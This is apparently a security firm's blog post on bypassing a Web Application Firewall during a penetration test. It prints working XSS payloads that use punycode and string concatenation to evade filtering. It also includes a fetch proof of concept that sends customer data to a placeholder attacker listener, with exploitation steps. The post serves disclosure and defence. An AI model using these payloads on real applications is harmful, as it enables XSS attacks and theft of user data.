← All insights
Vulnerability Research

A WAF Bypass

“Hey, I don’t believe any system is totally secure” - David Lightman, Wargames

Introduction

If Wargames were remade in 2022, the WOPR would operate behind a Web Application Firewall (WAF). During penetration testing, security teams must identify WAF bypasses quickly rather than spending weeks researching vulnerabilities. This article documents two methods OSec discovered to bypass WAF protections during an application assessment.

Web Application Firewalls have existed since 1991 and focus on blocking Layer 7 attacks like XSS and SQL injection. WAFs are a useful compensating control for vulnerable applications, but a successful bypass exposes the underlying security issues they were papering over.

Method 1

The first payload exploited character limits in the WAF’s filtering rules. OSec used a short domain name (15 characters) with punycode encoding to bypass restrictions:

a);d=self\[\`document\`\];e=d.createElement(\`script\`);e\[\`src\`\]='//15.₨';d.write(e)//_

This stored XSS payload injected into an event handler:

onchange="isValidFromDate(this, frmmain.{USER-INPUT}toDate);filterDates('{USER-INPUT}')"

Implementation steps:

  1. Host exploit code on an attacker-controlled domain
  2. Use this proof-of-concept to exfiltrate customer data:
fetch('<https://<VULNERABLE URL>.com/Customer/Summary?CustomerId=2').then((response) => {
    return response.text();
}).then((resp) => {
    fetch("//{ATTACKER-LISTENER}", {
        method: "POST",
        body: resp,
        mode: 'no-cors'
    })
});
  1. Replace {ATTACKER-LISTENER} with the attacker’s receiving server

Method 2

OSec identified string concatenation as a WAF evasion technique. The WAF failed to block function access when split across multiple strings:

test);self\[\`wi\`+'ndow'\]\[\`\\a\`+'lert'\](self\[\`doc\`+'ument'\]\[\`doma\`+'in'\]);//

Steps:

  1. Navigate to the vulnerable form
  2. Submit the payload in any form field
  3. Upon page refresh, trigger the XSS by interacting with vulnerable elements

Remediation

Organizations should:

  • Configure WAFs to properly filter user-controlled input
  • Implement secure SDLC processes
  • Manage vulnerabilities effectively
  • Conduct regular penetration testing

Further reading:

More in Vulnerability Research
Pip Dreams and Security Schemes, Part II: The Interpreter in the MachineJun 4, 2026 · 11 minRotten Apples Returns — macOS Codesigning Translocation RevisitedMay 7, 2026 · 5 minPip Dreams and Security Schemes: Chaos in your Configuration FilesSep 18, 2024 · 1 min
Talk to an expert